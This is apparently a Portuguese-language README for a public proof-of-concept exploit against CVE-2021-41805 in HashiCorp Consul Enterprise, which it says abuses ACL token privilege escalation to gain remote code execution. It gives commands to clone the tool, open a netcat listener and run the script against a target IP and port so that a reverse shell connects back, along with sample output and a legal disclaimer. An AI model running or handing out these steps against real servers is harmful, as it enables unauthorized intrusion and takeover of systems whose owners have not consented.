
Uma prova de conceito para CVE-2021-41805, que é uma vulnerabilidade no HashiCorp Consul Enterprise que permite Execução Remota de Código (RCE) com privilégios elevados.
[!WARNING] AVISO LEGAL: Esta ferramenta é estritamente para fins educacionais APENAS! O uso desta ferramenta para atacar alvos sem consentimento prévio mútuo é ILEGAL. É responsabilidade do usuário obedecer a todas as leis aplicáveis ao usar esta ferramenta. O desenvolvedor desta ferramenta não assume nenhuma responsabilidade e não é responsável por qualquer uso indevido ou dano causado por este programa.
Um token ACL (com as permissões padrão operator:write) em um namespace pode ser usado para elevação não intencional de privilégios em um namespace diferente. Isso pode ser abusado para obter Execução Remota de Código (RCE) com privilégios elevados.
git clone https://github.com/acfirthh/CVE-2021-41805.gitcd CVE-2021-41805nc -nvlp <PORTA_LISTENER>python3 CVE-2021-41805.py -r <IP_ALVO> -rp <PORTA_ALVO> -l <IP_LISTENER> -lp <PORTA_LISTENER> [OPCIONAL: -t <token ACL> -v (verbose) -s (usar SSL)]
Executar o exploit com os argumentos básicos: -r [IP_ALVO], -rp [PORTA_ALVO], -l [IP_LISTENER], -lp [PORTA_LISTENER] (-t [TOKEN_ACL], -s [Usar SSL]) fornecerá uma saída básica como:
[*] A requisição PUT foi feita com sucesso. Verifique seu listener...
Executar o exploit com os argumentos básicos mais -v [VERBOSE] fornecerá uma saída detalhada:

Se ocorrer um erro ao executar o exploit e o argumento -v for especificado, a saída será algo como:
